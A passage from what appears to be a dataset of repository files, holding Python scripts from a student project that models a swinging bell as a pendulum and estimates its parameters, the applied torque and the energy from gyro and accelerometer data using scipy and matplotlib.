m,l,J,fric = params\n theta,theta_prev,t = args\n g = 9.81\n theta_next = (2*theta + (fric*dt/(2*J)-1)*theta_prev -m*g*l/J*np.sin(theta)*dt**2)/(1+fric*dt/(2*J))\n error = abs(theta_next - theta_measured[t+1])\n return error\n\npara = []\n\nfor k in range(1,len(theta_measured)-601):\n popt = fmin_bfgs(func,popt,args=(theta[k],theta[k-1],k))\n para.append(popt)\n m,l,J,fric = popt\n theta[k+1] = (2*theta[k] + (fric*dt/(2*J)-1)*theta[k-1] - m*g*l/J*np.sin(theta[k])*dt**2)/(1+fric*dt/(2*J))\n\nprint(np.mean(para,0))\npopt = np.mean(para,0)\n\nfor k in range(1,int(time_elapsed/dt-1)):\n m,l,J,fric = popt\n theta[k+1] = (2*theta[k] + (fric*dt/(2*J)-1)*theta[k-1] -m*g*l/J*np.sin(theta[k])*dt**2)/(1+fric*dt/(2*J))\n\nplt.plot(np.linspace(0,time_elapsed,int(time_elapsed/dt)),theta)\nplt.plot(timestamps_trunc1[:-1],theta_measured)\nplt.xlabel('Time (s)')\nplt.ylabel('Angle (rad)')\nplt.show()\n\nprint(para)\nplt.plot(range(len(para[:][0])),para[:][0])\nplt.plot(range(len(para[:][0])),para[:][1])\nplt.plot(range(len(para[:][0])),para[:][2])\nplt.plot(range(len(para[:][0])),para[:][3])\nplt.show()\n"
},
{
"alpha_fraction": 0.6904761791229248,
"alphanum_fraction": 0.7251700758934021,
"avg_line_length": 28.399999618530273,
"blob_id": "5db66e9477d6a1ad96533c0484555b660af1ea82",
"content_id": "3a58afb34bc46495254aee7167e08135db67f5b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1470,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 50,
"path": "/theory.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nimport scipy\nfrom scipy import integrate\nfrom scipy.signal import find_peaks\nfrom scipy.optimize import curve_fit\nfrom matplotlib import animation\n\nfile = '/Users/shuowanghe/github/IIB-Project/test.csv'\ndata = genfromtxt(file,delimiter=',')\ntimestamps = data[:,0]\na_r = data[:,1]\na_theta = data[:,2]\ntheta_dot = data[:,3]\n#get max theta dot points to get theta=0 points\ntheta_zeros,_ = scipy.signal.find_peaks(abs(theta_dot),prominence=0)\nprint(timestamps[theta_zeros])\nfirst_theta_zero_idx = theta_zeros[1]\ntimestamps_trunc1 = timestamps[first_theta_zero_idx:]\ntheta_dot_trunc1 = theta_dot[first_theta_zero_idx:]\ntheta_measured = scipy.integrate.cumtrapz(theta_dot_trunc1,timestamps_trunc1)\ntimestamps_trunc1 = timestamps_trunc1 - timestamps_trunc1[0]\n\nxdata = theta_measured\nydata = np.gradient(theta_dot,timestamps)\n\nm = 0.4\ng = 9.81\nl = 0.42\nJ = 1.05\nfric = 0.07\ndt = 1/50\ntime_elapsed = 20\ntheta = np.zeros(int(time_elapsed/dt))\ntheta[0] = theta_measured[0]\ntheta[1] = theta_measured[1]\nT = np.zeros(int(time_elapsed/dt))\n\n\nfor k in range(1,int(time_elapsed/dt-1)):\n theta[k+1] = (2*theta[k] + (fric*dt/(2*J)-1)*theta[k-1] -m*g*l/J*np.sin(theta[k])*dt**2)/(1+fric*dt/(2*J))\n\nplt.plot(np.linspace(0,time_elapsed,int(time_elapsed/dt)),theta)\nplt.plot(timestamps_trunc1[:-1],theta_measured)\nplt.xlabel('Time (s)')\nplt.ylabel('Angle (rad)')\nplt.show()\nplt.show()\n"
},
{
"alpha_fraction": 0.6486880779266357,
"alphanum_fraction": 0.6652068495750427,
"avg_line_length": 50.75149154663086,
"blob_id": "7a1264d0e4d076c72bdd9946a3074a287e611d95",
"content_id": "d29bafd8c9b125fdc9dda3db1b6a28414dda32e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 26031,
"license_type": "no_license",
"max_line_length": 172,
"num_lines": 503,
"path": "/pendulum.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "###-------------------------------------------------------------------------###\n###---------------------------------IMPORTS---------------------------------###\n###-------------------------------------------------------------------------###\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nimport scipy\nfrom scipy import integrate\nfrom scipy.optimize import least_squares\nfrom scipy.signal import find_peaks\nfrom scipy.signal import savgol_filter\nfrom scipy.integrate import cumtrapz\nfrom matplotlib import animation\n###-------------------------------------------------------------------------###\n###------------------------UNPACK DATA AND GET ZEROS------------------------###\n###-------------------------------------------------------------------------###\n#Gather and unpack data from CSV\nuserinput_file = '/Users/shuowanghe/github/IIB-Project2/data/adafruitmay26th/onesidepush.csv'\nuserinput = genfromtxt(userinput_file,delimiter=',')\nfreeswing_file = '/Users/shuowanghe/github/IIB-Project2/data/adafruitmay26th/freeswing.csv'\nfreeswing = genfromtxt(freeswing_file,delimiter=',')\ntimestamps,a_r,a_theta,theta_dot = userinput[:,0], userinput[:,1], userinput[:,2], userinput[:,3]\n#Differentiate gyro signal to get angular acceleration, then smooth with Sav-Gol filter\ntheta_double_dot = np.gradient(theta_dot,timestamps)\nfiltered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)\n#Smooth the radial acceleration signal to find theta=zeros\nfiltered_a_r = savgol_filter(a_r,window_length=21, polyorder=2)\ntheta_zeros,_ = find_peaks(filtered_a_r,prominence=0.5)\nstart = theta_zeros[0]\nfree_start_zeros,_ = find_peaks(savgol_filter(freeswing[:,1],window_length=21, polyorder=2),prominence=0.5)\nfree_start = free_start_zeros[0]\n###-------------------------------------------------------------------------###\n###--------------------------------FUNCTIONS--------------------------------###\n###-------------------------------------------------------------------------###\n#Function for getting angle from gyro by re-integrating at every theta=0 and distributing the drift\ndef get_theta(data):\n #find theta=zeros\n timestamps = data[:,0]\n a_r = data[:,1]\n theta_dot = data[:,3]\n filtered_a_r = savgol_filter(a_r,window_length=21, polyorder=2)\n theta_zeros,_ = find_peaks(filtered_a_r,prominence=0.5)\n start = theta_zeros[0]\n #integrate theta and distribute drift before every zero\n theta_int_once = cumtrapz(theta_dot[start:],timestamps[start:],initial=0)\n theta_fix = np.zeros(len(timestamps)) #generate an array to hold the fixed theta\n theta_fix[start:] = theta_int_once #put the hard integrated theta between the first 2 zeros\n prev_zero = start #initiate the last theta=0 as the first one for the loop\n for _ in theta_zeros[1:]: #reintegrate and correct drift\n time_section = timestamps[prev_zero:_+1] #carve out the section between the 2 zeros\n theta_dot_section = theta_dot[prev_zero:_+1]\n theta_section = cumtrapz(theta_dot_section,time_section,initial=0) #make the integration\n drift = theta_section[-1] #find the drift at the end of the section\n drift_vec = np.linspace(start=0,stop=drift,num=_-prev_zero+1) #generate a vector increasing steadily from 0 to the drift over that time frame\n theta_fix[prev_zero:_] = theta_section[:-1]-drift_vec[:-1] #make the correction so the last theta=0\n prev_zero = _ #store the zero point for the next loop\n return theta_fix #returns the drift-fixed theta\n\n#Function for getting the gradient in the sin(theta) vs ang accel equation\ndef get_gradient(data):\n theta = get_theta(data) #get drift corrected theta from the data #find theta=zeros\n timestamps = data[:,0]\n theta_dot = data[:,3]\n start = find_peaks(savgol_filter(data[:,1],window_length=21, polyorder=2),prominence=0.5)[0][0]\n theta_double_dot = np.gradient(theta_dot,timestamps)\n x = np.sin(theta)[start:]\n y = savgol_filter(theta_double_dot,window_length=25, polyorder=3)[start:]\n p = np.polyfit(x,y,deg=1)[0] #fit a line through all of the data points\n return p\n\n#Function for finding where force is being applied\ndef forcefinder(force):\n smooth_force = savgol_filter(force,window_length=45,polyorder=3)\n low_smooth_force = savgol_filter(force,window_length=35,polyorder=3)\n peaks,_ = find_peaks(abs(low_smooth_force),prominence=1)\n peak_matrix = np.zeros((len(peaks),3))\n peak_matrix[:,1] = peaks\n peaks = np.append(peaks,len(smooth_force))\n prev_peak = 0\n count = 0\n for i in peaks:\n mini_peaks_before,_ = find_peaks(abs(low_smooth_force)[prev_peak:i],prominence=0)\n begin = mini_peaks_before[-1]+prev_peak\n prev_end = mini_peaks_before[0]+prev_peak\n if count != len(peaks)-1:\n peak_matrix[count,0] = begin\n if count != 0:\n peak_matrix[count-1,2] = prev_end\n prev_peak = i\n count+=1\n return peak_matrix.astype(int)\n\n###-------------------------------------------------------------------------###\n###-------------------------------OPTIMISATION------------------------------###\n###-------------------------------------------------------------------------###\n#Optimise correction parameters for freeswing\ndef force_func(corrections):\n theta_correction_factor,gradient_correction_factor,theta_offset = corrections[0],corrections[1],corrections[2]\n theta = get_theta(freeswing)*theta_correction_factor+theta_offset\n theta_double_dot = np.gradient(freeswing[:,3],freeswing[:,0])\n filtered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)*theta_correction_factor\n p = get_gradient(freeswing)*gradient_correction_factor\n force = filtered_theta_double_dot[start:]-p*np.sin(theta[start:])\n return sum(abs(force))\nres=least_squares(fun=force_func, x0=[1,1,0])\nprint(\"theta factor: \",res.x[0],\"\\ngradient factor: \",res.x[1],\"\\ntheta offset: \",res.x[2],\"\\ncost: \",res.fun)\ntheta_correction_factor,gradient_correction_factor,theta_offset = res.x[0],res.x[1],res.x[2]\n#get the -mlg/J gradient from fitting the userinput graph\np = get_gradient(userinput)\n#Use re-integrated, drift corrected theta from now on\ntheta = get_theta(userinput)\n#Calculate some force quantity T/J using just the userinput data\nforce = filtered_theta_double_dot[start:]-p*np.sin(theta[start:])\nsmooth_force = savgol_filter(force,window_length=25, polyorder=3)\n#Calculate it post corrections from freeswing data\np_corrected = p*gradient_correction_factor\ntheta_corrected = theta*theta_correction_factor+theta_offset\ntheta_dot_corrected = theta_dot*theta_correction_factor\nforce_corrected = theta_correction_factor*filtered_theta_double_dot[start:]-p_corrected*np.sin(theta_corrected[start:])\nsmooth_force_corrected = savgol_filter(force_corrected,window_length=25, polyorder=3)\n#get the indices where force is being applied and released\npeak_matrix = forcefinder(force_corrected)\n#get following data but when force isnt applied\nno_force_times = timestamps[start:]\nno_force_force = force\nno_force_theta = theta[start:]\nno_force_filtered_theta_double_dot = filtered_theta_double_dot[start:]\nfor i in range(len(peak_matrix)):\n force_range = range(peak_matrix[(len(peak_matrix)-1-i),0],peak_matrix[(len(peak_matrix)-1-i),2])\n no_force_times = np.delete(no_force_times,force_range)\n no_force_theta = np.delete(no_force_theta,force_range)\n no_force_force = np.delete(no_force_force,force_range)\n no_force_filtered_theta_double_dot = np.delete(no_force_filtered_theta_double_dot,force_range)\n#Optimise correction parameters again but only using no force data\ndef force_func2(corrections):\n theta_correction_factor,gradient_correction_factor,theta_offset = corrections[0],corrections[1],corrections[2]\n theta = no_force_theta*theta_correction_factor+theta_offset\n filtered_theta_double_dot = no_force_filtered_theta_double_dot*theta_correction_factor\n p = get_gradient(userinput)*gradient_correction_factor\n force = filtered_theta_double_dot-p*np.sin(theta)\n return sum(abs(force))\nres2=least_squares(fun=force_func2, x0=[1,1,0])\nprint(\"theta factor 2: \",res2.x[0],\"\\ngradient factor 2: \",res2.x[1],\"\\ntheta offset 2: \",res2.x[2],\"\\ncost 2: \",res2.fun)\ntheta_correction_factor2,gradient_correction_factor2,theta_offset2 = res2.x[0],res2.x[1],res2.x[2]\ntheta_corrected2 = theta*theta_correction_factor2+theta_offset2\np_corrected2 = p*gradient_correction_factor2\ntheta_dot_corrected2 = theta_dot*theta_correction_factor2\nforce_corrected2 = filtered_theta_double_dot[start:]*theta_correction_factor2-p_corrected2*np.sin(theta_corrected2[start:])\nsmooth_force_corrected2 = savgol_filter(force_corrected2,window_length=35, polyorder=3)\n#find zero crossings of theta_dot, i.e. when bell is at extremes\ntheta_dot_zeros,_ = find_peaks(-abs(theta_dot_corrected2[start:]),prominence=1)\n#Produce clean force curve\nnoisy_peaks = find_peaks(-abs(smooth_force_corrected2),height=-0.5)[0]\nforce_curve = np.zeros(len(force_corrected2))\nstarts_and_ends = np.zeros((len(peak_matrix),2))\nforce_in = np.zeros(len(smooth_force_corrected2))\nforce_out = np.zeros(len(smooth_force_corrected2))\nenergy = np.zeros((len(peak_matrix),2))\npower = np.zeros((len(peak_matrix),2))\ncount = 0\n\nforce_peaks = [0] * (len(theta_zeros)-1)\n\nfor i in range(len(theta_zeros)-1):\n section = range(theta_zeros[i],theta_zeros[i+1])-start\n force_section = force[section]\n if theta[start:][section[0]+10]<0: #if theta is pointing down, then flip the force section\n force_section *= -1\n force_peaks[i] = np.argmax(force[find_peaks(-force_section)[0]])+section[0]\n # force_range_peaks = find_peaks(abs(low_smooth_force)[section],prominence=0)\n # mini_peaks_before,_ = find_peaks(abs(low_smooth_force)[prev_peak:i],prominence=0)\n # begin = mini_peaks_before[-1]+prev_peak\n # prev_end = mini_peaks_before[0]+prev_peak\n # if count != len(peaks)-1:\n # peak_matrix[count,0] = begin\n # if count != 0:\n # peak_matrix[count-1,2] = prev_end\n\n# plt.plot(timestamps,theta,label='theta')\n# plt.plot(timestamps[start:],force,label='force')\n# plt.plot(timestamps[start:][force_peaks],force[force_peaks],'x',label='force peaks')\n# plt.show()\n#\n# peaks = find_peaks(abs(force),prominence=0,distance=25)[0]\n# smoothed_peaks = find_peaks(abs(low_smooth_force),prominence=0,distance=25)[0]\n# plt.plot(timestamps,theta,label='theta')\n# plt.plot(timestamps[start:],force,label='force')\n# plt.plot(timestamps[start:][peaks],force[peaks],'x',label='force peaks')\n# plt.plot(timestamps[start:],low_smooth_force,label='low smooth')\n# plt.plot(timestamps[start:][smoothed_peaks],low_smooth_force[smoothed_peaks],'x',label='peaks for low smooth force')\n# # plt.plot(timestamps[start:],smooth_force,label='smooth')\n# plt.legend()\n# plt.show()\n\n\n\nfor _ in peak_matrix[:,1]:\n force_start = max(noisy_peaks[noisy_peaks<_])\n force_end = min(noisy_peaks[noisy_peaks>_])\n # starts_and_ends[count,0],starts_and_ends[count,1] = force_start,force_end\n force_curve[force_start:force_end] = smooth_force_corrected2[force_start:force_end]\n nearest_theta_dot_zero = theta_dot_zeros[abs(_-theta_zeros).argmin()]\n if force_start<nearest_theta_dot_zero:\n force_out[force_start:nearest_theta_dot_zero] = force_curve[force_start:nearest_theta_dot_zero]\n if force_end>nearest_theta_dot_zero:\n force_in[nearest_theta_dot_zero:force_end] = force_curve[nearest_theta_dot_zero:force_end]\n energy[count,0] = max(cumtrapz(abs(force_in)[force_start:force_end],initial=0))\n energy[count,1] = max(cumtrapz(abs(force_out)[force_start:force_end],initial=0))\n power[count,0] = sum(np.multiply(abs(theta_dot_corrected2[start:])[force_start:force_end],abs(force_in)[force_start:force_end]))\n power[count,1] = sum(np.multiply(abs(theta_dot_corrected2[start:])[force_start:force_end],abs(force_out)[force_start:force_end]))\n count += 1\n\n\n\n# plt.plot(timestamps[start:],force_curve)\n# plt.plot(timestamps[start:],theta_dot[start:])\nplt.plot(timestamps[start:],np.multiply(theta_dot[start:],force_curve))\nplt.xlabel(r'time (s)')\nplt.ylabel(r'Power input $\\frac{T}{J}\\dot{\\theta}(s^{-3})$')\nplt.show()\nstored_energy = cumtrapz(np.multiply(theta_dot[start:],force_curve),initial=0) #starts at start\nenergy_zeros = find_peaks(-stored_energy)[0] #starts at start\nenergy_start = energy_zeros[0] #starts at start\nzero_energy_line = np.polyfit(timestamps[start:][energy_zeros],stored_energy[start:][energy_zeros],deg=1)[0]\nstored_energy = stored_energy[energy_start:]\nstored_energy_times = timestamps[start+energy_start:]-timestamps[start+energy_start]\nenergy_zeros -= energy_zeros[0]\nplt.plot(stored_energy_times,stored_energy,label='Stored energy')\nplt.plot(stored_energy_times[energy_zeros],stored_energy[energy_zeros],'x',label='Energy \"zeros\"')\nplt.plot(np.array([0,60]),np.array([0,60])*zero_energy_line,'--',linewidth=0.5,label='Line fitting energy \"zeros\"')\nplt.xlabel(r'time (s)')\nplt.ylabel(r'System energy $\\int{\\frac{T}{J}\\dot{\\theta}}dt(s^{-2})$')\nplt.legend()\nplt.show()\n\nplt.plot(stored_energy_times,stored_energy-stored_energy_times*zero_energy_line,label='Stored energy accounting for friction')\nplt.plot(timestamps[start:][theta_dot_zeros]-timestamps[start:][theta_dot_zeros[0]],np.zeros(len(theta_dot_zeros)),'x')\nplt.axhline(linestyle='--',linewidth=0.5)\nplt.xlabel(r'time (s)')\nplt.ylabel(r'System energy adjusted for friction $\\int{\\frac{T}{J}\\dot{\\theta}}dt(s^{-2})$')\nplt.show()\n\nplt.plot(stored_energy_times,stored_energy-stored_energy_times*zero_energy_line,label='Stored energy accounting for friction')\nenergy_calculation = 0.5*(1-p_corrected2*100/9.81)*theta_dot - p_corrected2*(1-np.cos(theta))\nplt.plot(timestamps-timestamps[start+energy_start],energy_calculation,label='Energy Calculated')\nplt.axhline(linestyle='--',linewidth=0.5)\nplt.xlabel(r'time (s)')\nplt.ylabel(r'System energy calculated $\\int{\\frac{T}{J}\\dot{\\theta}}dt(s^{-2})$')\nplt.show()\n\n# plt.plot(timestamps[start:],theta_corrected2[start:])\n# plt.plot(timestamps[start:][theta_dot_zeros],theta_corrected2[start:][theta_dot_zeros],'x')\nplt.plot((stored_energy-stored_energy_times*zero_energy_line)[energy_zeros],abs(theta_corrected2[start:][theta_dot_zeros]),'x')\ncorrelation = np.polyfit((stored_energy-stored_energy_times*zero_energy_line)[energy_zeros],abs(theta_corrected2[start:][theta_dot_zeros]),deg=1)\nplt.plot(np.array([-15,0]),np.array([-15,0])*correlation[0]+correlation[1],'--',linewidth=0.5)\nerr = np.mean(abs(abs(theta_corrected2[start:][theta_dot_zeros])-((stored_energy-stored_energy_times*zero_energy_line)[energy_zeros]*correlation[0]+correlation[1])),axis=0)\nplt.ylabel(r'Angle at max (rad)')\nplt.xlabel(r'System energy calculated $\\int{\\frac{T}{J}\\dot{\\theta}}dt(s^{-2})$')\nplt.show()\n\n# print(np.column_stack((power,power[:,0]-power[:,1])))\n\n# theta_peaks = find_peaks(abs(get_theta(freeswing)[free_start:]))[0]\n# exponent = np.polyfit(freeswing[free_start:,0][theta_peaks],np.log(abs(get_theta(freeswing)[free_start:][theta_peaks])),1)\n# plt.plot(freeswing[free_start:,0],abs(get_theta(freeswing)[free_start:]))\n# plt.plot(freeswing[free_start:,0],np.exp(exponent[1])*np.exp(exponent[0]*freeswing[free_start:,0]))\n\n# plt.plot(timestamps[start:],force,label='force')\n# plt.plot(timestamps[start:],force_corrected,label='force corrected')\n# plt.plot(timestamps[start:],force_corrected2,label='force corrected 2')\n# plt.plot(no_force_times,no_force_force,'.')\nplt.show()\n#\n# plt.legend()\n\n# plt.plot(timestamps[start:],theta_corrected2[start:],label=r'$\\theta$')\n#\n# plt.plot(timestamps,filtered_a_r)\n# theta_zero = find_peaks(filtered_a_r,prominence=0.5)[0]\n# plt.plot(timestamps[theta_zero],filtered_a_r[theta_zero],'x')\nplt.plot(timestamps[start:],theta_corrected2[start:])\nplt.plot(timestamps[start:],force)\n# plt.plot(timestamps[start:],smooth_force_corrected)\nplt.show()\n#\n#\n#\n# plt.plot(timestamps[start:],force_corrected)\n# plt.plot(timestamps[start:],force_corrected2)\n# plt.plot(timestamps[start:][peak_matrix[:,1]],force_corrected2[peak_matrix[:,1]])\n# plt.plot(no_force_times,no_force_force,'.')\n#\n#\n# plt.plot(timestamps,theta_dot)\n# plt.plot(timestamps[start:][theta_dot_zeros],theta_corrected2[start:][theta_dot_zeros],'x',label=r'$\\theta$ maximums')\nabs(theta_corrected2[start:][theta_dot_zeros])\ntheta_differences = np.zeros(len(theta_dot_zeros)-1)\nenergy_differences = np.zeros(len(theta_dot_zeros)-1)\nfor i in range(len(theta_dot_zeros)-1):\n theta_differences[i] = abs(np.cos(theta_corrected2[start:][theta_dot_zeros[i+1]]))-abs(np.cos(theta_corrected2[start:][theta_dot_zeros[i]]))\n energy_differences[i] = power[i,0]-power[i+1,1]\n#\n# plt.plot(energy_differences,theta_differences,'.')\n#\n# plt.plot(timestamps[start:][theta_dot_zeros],abs(theta_dot_corrected2[start:][theta_dot_zeros]),'x',label=r'$\\theta$')\n# # plt.plot(timestamps[start:][peak_matrix[:,1]],abs(force_curve)[peak_matrix[:,1]],'x')\nplt.plot(timestamps[start:],abs(force_in),'g')\nplt.plot(timestamps[start:],abs(force_out),'r')\nplt.xlabel('time (s)')\nplt.ylabel(r'$\\frac{T}{J}$(rad$s^{-2}$)')\n# plt.plot(timestamps[start:],theta_corrected2[start:])\n# plt.plot(timestamps[start:],abs(theta_dot)[start:])\n# plt.plot(timestamps[start:],-abs(smooth_force_corrected2))\n# plt.plot(timestamps[start:][theta_dot_zeros],theta_dot[start:][theta_dot_zeros],'x')\n# plt.plot(timestamps[start:][noisy_peaks],-abs(smooth_force_corrected2)[noisy_peaks],'x')\nplt.show()\n# plt.plot(timestamps[start:],theta_dot[start:])\n# plt.plot(timestamps[start:][theta_dot_zeros],theta_dot[start:][theta_dot_zeros],'x')\n# plt.plot(timestamps[start:],theta[start:])\n# plt.plot(timestamps[theta_zeros],theta[theta_zeros],'x')\n\n# plt.plot(timestamps[start:],abs(force_corrected2))\n# plt.plot(timestamps[start:],abs(smooth_force_corrected2))\n# plt.plot(timestamps[start:],-abs(force_corrected2))\n# plt.show()\n# plt.plot(timestamps[start:][peak_matrix2[:,0]],abs(smooth_force_corrected2)[peak_matrix2[:,0]],'x')\n# plt.plot(timestamps[start:][peak_matrix2[:,2]],abs(smooth_force_corrected2)[peak_matrix2[:,2]],'x')\n# plt.show()\n\n###-------------------------------------------------------------------------###\n###-------------------------------UNCERTAINTY-------------------------------###\n###-------------------------------------------------------------------------###\ndef remove_mean(data):\n start = find_peaks(savgol_filter(data[:,1],window_length=21, polyorder=2),prominence=5)[0][0]\n theta_double_dot = np.gradient(data[:,3],data[:,0])[start:]\n filtered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)\n p = get_gradient(data)\n theta = get_theta(data)[start:]\n force = filtered_theta_double_dot-p*np.sin(theta)\n no_bins = 20\n means_variance = np.zeros([no_bins,2])\n free_theta = get_theta(freeswing)[free_start:]\n free_p = get_gradient(freeswing)\n free_theta_double_dot = np.gradient(freeswing[:,3][free_start:],freeswing[:,0][free_start:])\n free_filtered_theta_double_dot = savgol_filter(free_theta_double_dot,window_length=25, polyorder=3)\n free_force = free_filtered_theta_double_dot-free_p*np.sin(free_theta)\n fixed_force = filtered_theta_double_dot-p*np.sin(theta)\n for bin in range(no_bins):\n bin_start = (bin-no_bins/2)*2*np.pi/no_bins\n bin_end = (bin-no_bins/2+1)*2*np.pi/no_bins\n free_bin_indices = np.where((free_theta>=bin_start)&(free_theta<bin_end))\n data_bin_indices = np.where((theta>=bin_start)&(theta<bin_end))\n if np.size(free_bin_indices)>0:\n means_variance[bin,0] = np.mean(free_force[free_bin_indices])\n means_variance[bin,1] = np.var(free_force[free_bin_indices])\n fixed_force[data_bin_indices] = force[data_bin_indices] - means_variance[bin,0]\n return fixed_force, means_variance\n\"\"\"\n###-------------------------------------------------------------------------###\n###--------------------------------ANIMATIONS-------------------------------###\n###-------------------------------------------------------------------------###\n#THETA_DOUBLE_DOT vs SIN(THETA) ANIMATION\n\nfig = plt.figure()\nax = plt.axes(xlim=(-1.5, 1.5), ylim=(-10,10))\nline, = ax.plot([], [], lw=1)\ndef init():\n line.set_data([], [])\n return line,\n#Animation function. This is called sequentially\ndef animate(i):\n y = filtered_theta_double_dot[start:start+i]\n x = np.sin(theta[start:start+i])\n line.set_data(x, y)\n return line,\n#Call the animator. blit=True means only re-draw the parts that have changed.\nanim = animation.FuncAnimation(fig, animate, init_func=init, frames=len(theta), interval=20, blit=True)\n#Save the animation\n#anim.save('2sidepushfix.gif', fps=50, extra_args=['-vcodec', 'libx264'])\n#Plot the animation\nx = np.array([-2,2])\nplt.plot(x,p*x,'r',linewidth=1,label=\"Fit\") #plot the fitted line, through the origin\nplt.xlabel(r'sin($\\theta$)')\nplt.ylabel(r'$\\\"{\\theta}$(rad/$s^2$)')\nplt.title(r'$\\\"{\\theta}$ vs sin($\\theta$)')\nplt.show()\n\"\"\"\n#PENDULUM AND FORCE ANIMATION\nfig_pend = plt.figure()\nax_pend = plt.axes(xlim=(-1.5, 1.5), ylim=(-1.5,1.5))\nbell, = ax_pend.plot([], [], 'bo', lw=5,label='Bell')\ntorque, = ax_pend.plot([], [], 'ro', lw=5, label='Force')\ndef init_pend():\n bell.set_data([], [])\n torque.set_data([], [])\n return bell, torque,\n#Animation function. This is called sequentially\ndef animate_pend(i):\n y = -np.cos(theta_corrected2[i+start]) #Bell's y position\n x = np.sin(theta_corrected2[i+start]) #Bell's x position\n bell.set_data(x, y)\n x_torque = force_curve[i] #Torque/J at time i\n torque.set_data(x_torque/3,0)\n return bell, torque,\n#Call the animator. blit=True means only re-draw the parts that have changed.\nanim_pend = animation.FuncAnimation(fig_pend, animate_pend, init_func=init_pend, frames=len(theta[start:]), interval=20, blit=True)\n#anim_pend.save('2sidepush_force.gif', fps=50, extra_args=['-vcodec', 'libx264'])\nplt.title('Bell swinging and force applied')\nplt.legend()\nplt.show()\n\"\"\"\n#FORCE vs VELOCITY ANIMATION\nfig_force_vel = plt.figure()\nax_force_vel = plt.axes(xlim=(-5, 5), ylim=(-3,3))\nline_force_vel, = ax_force_vel.plot([], [], lw=2)\ndef init_force_vel():\n line_force_vel.set_data([], [])\n return line_force_vel,\n#Animation function. This is called sequentially\ndef animate_force_vel(i):\n y = smooth_force[0:i]\n x = theta_dot[start:start+i]\n line_force_vel.set_data(x, y)\n return line_force_vel,\n#Call the animator. blit=True means only re-draw the parts that have changed.\nanim_force_vel = animation.FuncAnimation(fig_force_vel, animate_force_vel, init_func=init_force_vel,\n frames=len(force), interval=20, blit=True)\n#Save the animation\n#anim.save('2sidepushfix.gif', fps=50, extra_args=['-vcodec', 'libx264'])\n#Plot the animation\nplt.xlabel(r'$\\dot{\\theta}$')\nplt.ylabel(r'Some force $\\frac{T}{J}$')\nplt.title(r'Force vs $\\dot{\\theta}$')\nplt.show()\n\n###-------------------------------------------------------------------------###\n###----------------------------------PLOTS----------------------------------###\n###-------------------------------------------------------------------------###\n#Plot line fit through theta double dot vs sin(theta) relationship\n\n#allowed_indices = np.where(abs(x)<20.2) #find indices where line is straight\nx = np.sin(theta[start:])\ny = filtered_theta_double_dot[start:]\nplt.plot(x,y,'x',label='All points') #plot all the data points\n#plt.plot(x[allowed_indices],y[allowed_indices],'gx',label='Points used in fitting') #plot the allowed data points for fitting\nplt.plot(x,p*x,'r',label='Line fit through origin of central points') #plot the fitted line, through the origin\nplt.xlabel(r'sin($\\theta$)')\nplt.ylabel(r'$\\\"{\\theta}$(rad/$s^2$)')\nplt.title(r'$\\\"{\\theta}$ vs sin($\\theta$) with a line fitted through')\nplt.show()\n\n#Force, theta and theta_dot vs time\nplt.plot(timestamps[start:],force,label=\"Force measurement\")\nplt.plot(timestamps[start:],smooth_force,label=\"Force measurement (Smoothed)\")\nplt.plot(timestamps[start:],theta[start:],label=r'$\\theta$')\nplt.plot(timestamps[start:],theta_dot[start:],label=r'$\\dot{\\theta}$')\nplt.axhline(0,color='b',linestyle='--')\nplt.xlabel(r't(s)')\nplt.ylabel(r'$\\\"{\\theta}+\\frac{mgl}{J}sin(\\theta)$(rad/$s^2$)')\nplt.title(r'$\\frac{T}{J}$ vs time')\nplt.axhline(0,color='b',linestyle='--')\nplt.legend()\nplt.show()\n\n#Force, theta and theta_dot vs time\n\n#plt.plot(timestamps[start:][peaks],force[peaks],'x',label=\"Force measurement\")\n#plt.plot(timestamps[start:],force,label=\"Force measurement\")\nplt.plot(timestamps[start:],force,label=\"Force measurement\")\nplt.plot(timestamps[start:],smooth_force,label=\"Force measurement (Smoothed)\")\nfor i in range(len(peak_matrix)):\n plt.plot(timestamps[start:][peak_matrix[i,0]:peak_matrix[i,2]],force[peak_matrix[i,0]:peak_matrix[i,2]],'r-')\n plt.plot(timestamps[start:][peak_matrix[i,0]:theta_dot_zeros[i]],force[peak_matrix[i,0]:theta_dot_zeros[i]],'b-')\n plt.plot(timestamps[start:][theta_dot_zeros[i]:peak_matrix[i,2]],force[theta_dot_zeros[i]:peak_matrix[i,2]],'g-')\n#plt.plot(timestamps[start:][peak_matrix[:,0]],abs(smooth_force)[peak_matrix[:,0]],'x')\n#plt.plot(timestamps[start:][peak_matrix[:,2]],abs(smooth_force)[peak_matrix[:,2]],'x')\nplt.plot(timestamps[start:],theta[start:],label=r'$\\theta$')\n#plt.plot(timestamps[start:],abs(theta_dot[start:]),label=r'$\\dot{\\theta}$')\nplt.axhline(0,color='b',linestyle='--')\nplt.xlabel(r't(s)')\nplt.ylabel(r'$\\\"{\\theta}+\\frac{mgl}{J}sin(\\theta)$(rad/$s^2$)')\nplt.title(r'$\\frac{T}{J}$ vs time')\nplt.axhline(0,color='b',linestyle='--')\nplt.legend()\nplt.show()\n\n\n\n#Plot Force vs (mlg/J)sin(theta)\nplt.plot(-p*np.sin(theta[start:]),smooth_force)\nplt.xlabel(r'$\\frac{mgl}{J}sin(\\theta)$(rad/$s^2$)')\nplt.ylabel(r'$\\frac{T}{J}$')\nplt.title(r'$\\frac{T}{J}$ vs $\\frac{mgl}{J}sin(\\theta)$')\nplt.show()\n\n#Plot Force vs velocity\nplt.plot(theta_dot[start:],smooth_force)\nplt.xlabel(r'$\\dot{\\theta}$')\nplt.ylabel(r'$\\frac{T}{J}$')\nplt.title(r'Force vs $\\dot{\\theta}$')\nplt.show()\n\"\"\"\n"
},
{
"alpha_fraction": 0.5912284255027771,
"alphanum_fraction": 0.6244411468505859,
"avg_line_length": 39.14529800415039,
"blob_id": "8088e63a519f253242dee2a846a2068d1dab6fb8",
